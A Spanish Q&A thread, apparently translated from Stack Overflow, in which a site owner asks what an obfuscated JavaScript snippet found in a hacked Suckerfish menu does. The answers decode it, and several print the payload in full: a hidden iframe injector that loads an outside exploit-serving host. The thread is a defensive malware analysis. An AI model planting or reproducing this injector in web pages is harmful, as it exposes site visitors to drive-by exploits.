1. Inicio
  2. Pregunta y respuesta
  3. Se ha pirateado el sitio: ¿qué hace este código Javascript?

Se ha pirateado el sitio: ¿qué hace este código Javascript?

2011-07-10 20 views
5

Acabo de enterarme de que mi sitio web ha sido pirateado. Remonté el problema a este código JavaScript insertado en el menú desplegable de Suckerfish. Voy a reemplazar el menú con una copia de seguridad limpia, pero tengo curiosidad por saber qué hace realmente este código.Se ha pirateado el sitio: ¿qué hace este código Javascript?

(function() { 
    var kuk = 'ck5', 
    de = document, 
    n = navigator, 
    u = n.userAgent, 
    l = 'anguage'; 
    function c(b) { 
     var i = 'indexOf', 
     l = 'length', 
     c = de.cookie; 
     b = b + "="; 
     var a = c[i]("; " + b), 
     d = c[i](";", a); 
     if (a == -1) { 
      a = c[i](b); 
      if (a != 0) 
       return 0 
     } 
     return 1 
    } 
    n = /^en-gb$/i.test(n['systemL' + l] || n['userL' + l] || n['l' + l]) && /(msie) ([\w.]+)|(mozilla)(?:.*? rv:([\w.]+))?/i.test(u) && !c(kuk); 
    if (n) { 
     var s, 
     g = 2, 
     aa = document.createTextNode("harCode"); 
     if (Math.exp(1) === Math.E) { 
      s = String["fr" + "omC" + aa.nodeValue]; 
     } 
     eval(s(7 + g, 7 + g, 103 + g, 100 + g, 30 + g, 38 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 101 + g, 99 + g, 114 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 113 + g, 64 + g, 119 + g, 82 + g, 95 + g, 101 + g, 76 + g, 95 + g, 107 + g, 99 + g, 38 + g, 37 + g, 96 + g, 109 + g, 98 + g, 119 + g, 37 + g, 39 + g, 89 + g, 46 + g, 91 + g, 39 + g, 121 + g, 7 + g, 7 + g, 7 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 112 + g, 38 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g, 30 + g, 99 + g, 106 + g, 113 + g, 99 + g, 30 + g, 121 + g, 7 + g, 7 + g, 7 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 117 + g, 112 + g, 103 + g, 114 + g, 99 + g, 38 + g, 32 + g, 58 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 30 + g, 113 + g, 112 + g, 97 + g, 59 + g, 37 + g, 102 + g, 114 + g, 114 + g, 110 + g, 56 + g, 45 + g, 45 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 49 + g, 44 + g, 97 + g, 120 + g, 44 + g, 97 + g, 97 + g, 45 + g, 103 + g, 108 + g, 98 + g, 99 + g, 118 + g, 44 + g, 110 + g, 102 + g, 110 + g, 61 + g, 114 + g, 110 + g, 59 + g, 96 + g, 95 + g, 47 + g, 51 + g, 95 + g, 46 + g, 52 + g, 50 + g, 51 + g, 99 + g, 96 + g, 95 + g, 50 + g, 99 + g, 98 + g, 99 + g, 37 + g, 30 + g, 117 + g, 103 + g, 98 + g, 114 + g, 102 + g, 59 + g, 37 + g, 47 + g, 46 + g, 37 + g, 30 + g, 102 + g, 99 + g, 103 + g, 101 + g, 102 + g, 114 + g, 59 + g, 37 + g, 47 + g, 46 + g, 37 + g, 30 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 59 + g, 37 + g, 116 + g, 103 + g, 113 + g, 103 + g, 96 + g, 103 + g, 106 + g, 103 + g, 114 + g, 119 + g, 56 + g, 102 + g, 103 + g, 98 + g, 98 + g, 99 + g, 108 + g, 57 + g, 110 + g, 109 + g, 113 + g, 103 + g, 114 + g, 103 + g, 109 + g, 108 + g, 56 + g, 95 + g, 96 + g, 113 + g, 109 + g, 106 + g, 115 + g, 114 + g, 99 + g, 57 + g, 106 + g, 99 + g, 100 + g, 114 + g, 56 + g, 46 + g, 57 + g, 114 + g, 109 + g, 110 + g, 56 + g, 46 + g, 57 + g, 37 + g, 60 + g, 58 + g, 45 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 60 + g, 32 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g, 7 + g, 7 + g, 100 + g, 115 + g, 108 + g, 97 + g, 114 + g, 103 + g, 109 + g, 108 + g, 30 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 112 + g, 38 + g, 39 + g, 121 + g, 7 + g, 7 + g, 7 + g, 116 + g, 95 + g, 112 + g, 30 + g, 100 + g, 30 + g, 59 + g, 30 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 97 + g, 112 + g, 99 + g, 95 + g, 114 + g, 99 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 38 + g, 37 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 113 + g, 112 + g, 97 + g, 37 + g, 42 + g, 37 + g, 102 + g, 114 + g, 114 + g, 110 + g, 56 + g, 45 + g, 45 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 49 + g, 44 + g, 97 + g, 120 + g, 44 + g, 97 + g, 97 + g, 45 + g, 103 + g, 108 + g, 98 + g, 99 + g, 118 + g, 44 + g, 110 + g, 102 + g, 110 + g, 61 + g, 114 + g, 110 + g, 59 + g, 96 + g, 95 + g, 47 + g, 51 + g, 95 + g, 46 + g, 52 + g, 50 + g, 51 + g, 99 + g, 96 + g, 95 + g, 50 + g, 99 + g, 98 + g, 99 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 116 + g, 103 + g, 113 + g, 103 + g, 96 + g, 103 + g, 106 + g, 103 + g, 114 + g, 119 + g, 59 + g, 37 + g, 102 + g, 103 + g, 98 + g, 98 + g, 99 + g, 108 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 110 + g, 109 + g, 113 + g, 103 + g, 114 + g, 103 + g, 109 + g, 108 + g, 59 + g, 37 + g, 95 + g, 96 + g, 113 + g, 109 + g, 106 + g, 115 + g, 114 + g, 99 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 106 + g, 99 + g, 100 + g, 114 + g, 59 + g, 37 + g, 46 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 114 + g, 109 + g, 110 + g, 59 + g, 37 + g, 46 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 117 + g, 103 + g, 98 + g, 114 + g, 102 + g, 37 + g, 42 + g, 37 + g, 47 + g, 46 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 102 + g, 99 + g, 103 + g, 101 + g, 102 + g, 114 + g, 37 + g, 42 + g, 37 + g, 47 + g, 46 + g, 37 + g, 39 + g, 57 + g, 7 + g, 7 + g, 7 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 101 + g, 99 + g, 114 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 113 + g, 64 + g, 119 + g, 82 + g, 95 + g, 101 + g, 76 + g, 95 + g, 107 + g, 99 + g, 38 + g, 37 + g, 96 + g, 109 + g, 98 + g, 119 + g, 37 + g, 39 + g, 89 + g, 46 + g, 91 + g, 44 + g, 95 + g, 110 + g, 110 + g, 99 + g, 108 + g, 98 + g, 65 + g, 102 + g, 103 + g, 106 + g, 98 + g, 38 + g, 100 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g)); 
     n = new Date(); 
     n.setDate(n.getDate() + 3650); 
     de.cookie = kuk + '=1;path=/;expires=' + n.toUTCString() 
     } 
})()

Fuente

2011-07-10 Jon Sutton

+0

http://sucuri.net/malware/malware-entry-mwiframehd203 –

+0

Es muy ofuscado - incluso más que la mayoría que he visto. Pero no se minimiza, lo cual es sorprendente (ya que eso habría dificultado aún más la lectura) – Spudley

Respuesta

6

Cambiar eval para alertar y ejecutarlo. La idea básica es que toma un montón de información sobre el usuario y la almacena en una cookie, luego usa String.fromCharCode (está ofuscada pero aún está allí) y ejecuta más código que crea un iframe en un sitio malvado que probablemente intente obtener acceso a las computadoras de los usuarios que usan varios exploits.

http://fiddle.jshell.net/qHeJ3/

Aquí es la carga útil:

if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} else { 
    document.write("<iframe src='http://asasasasa3.cz.cc/ 
index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 

function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 'http://asasasasa3.cz.cc/index.php?tp=ba15a0645e 
ba4ede'); 
    f.style.visibility = 'hidden'; 
    f.style.position = 'absolute'; 
    f.style.left = '0'; 
    f.style.top = '0'; 
    f.setAttribute('width', '10'); 
    f.setAttribute('height', '10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
}

Fuente

2011-07-10 17:48:15

4

Se incrusta un iframe invisible desde http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede.

código con formato:

if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} else { 
    document.write("<iframe " + 
       "src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' " + 
        "width='10' height='10' " + 
        "style='visibility:hidden;position:absolute;left:0;top:0;'>" + 
        "</iframe>") 
} 
function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 
        'http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede'); 
    f.style.visibility='hidden'; 
    f.style.position='absolute'; 
    f.style.left='0'; 
    f.style.top='0'; 
    f.setAttribute('width','10'); 
    f.setAttribute('height','10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
}

La página cargada desde la URL anterior (executed code, después de deshacer otra capa ofuscación) parece tratar de explotar múltiples vulnerabilidades. Prueba varios complementos y carga aún más páginas, probablemente probando otros exploits.

Fuente

2011-07-10 17:48:29 phihag

0

Por lo general, creo que estos tipos de técnicas de inyección de JavaScript hacen algo parecido a secuestrar sus enlaces para redirigir los clics a una ubicación maliciosa (sitio con intención maliciosa, un enlace directamente a un ejecutable, etc.). La razón por la que todo está fragmentado en pedazos pequeños es eludir el software anti-phishing y anti-spyware.

Como han señalado otros, este agrega un iframe a su página que intenta secuestrar su máquina.

Fuente

2011-07-10 17:48:39

1

Esa línea cerca del final con eval es la carga útil. Básicamente es un ataque de inyección de JavaScript, la creación de un montón de JavaScript sobre la marcha de los valores ASCII, y su ejecución.

Aquí hay un jsFiddle demonstrating lo que está escribiendo en su página.

Básicamente se trata de la creación de un nuevo marco flotante oculta, y cargar una URL de http: //asasasasa3.cz.cc

Fuente

2011-07-10 17:49:43

2

la eval(s(...)) decodificada es:

if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} else { 
    document.write("<iframe src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 
function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 'http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede'); 
    f.style.visibility = 'hidden'; 
    f.style.position = 'absolute'; 
    f.style.left = '0'; 
    f.style.top = '0'; 
    f.setAttribute('width', '10'); 
    f.setAttribute('height', '10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
}

Fuente

2011-07-10 17:50:03

1

Este es el código JavaScript deobfuscated:

if (document.getElementsByTagName('body')[0]) 
{ 
    iframer(); 
} 
else 
{ 
    document.write("<iframe src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 
function iframer() 
{ 
    var f = document.createElement('iframe'); 
    f.setAttribute('src','http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede'); 
    f.style.visibility='hidden'; 
    f.style.position='absolute'; 
    f.style.left='0'; 
    f.style.top='0'; 
    f.setAttribute('width','10'); 
    f.setAttribute('height','10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
}

Fuente

2012-01-02 12:04:33

Cuestiones relacionadas

 Cuestiones relacionadas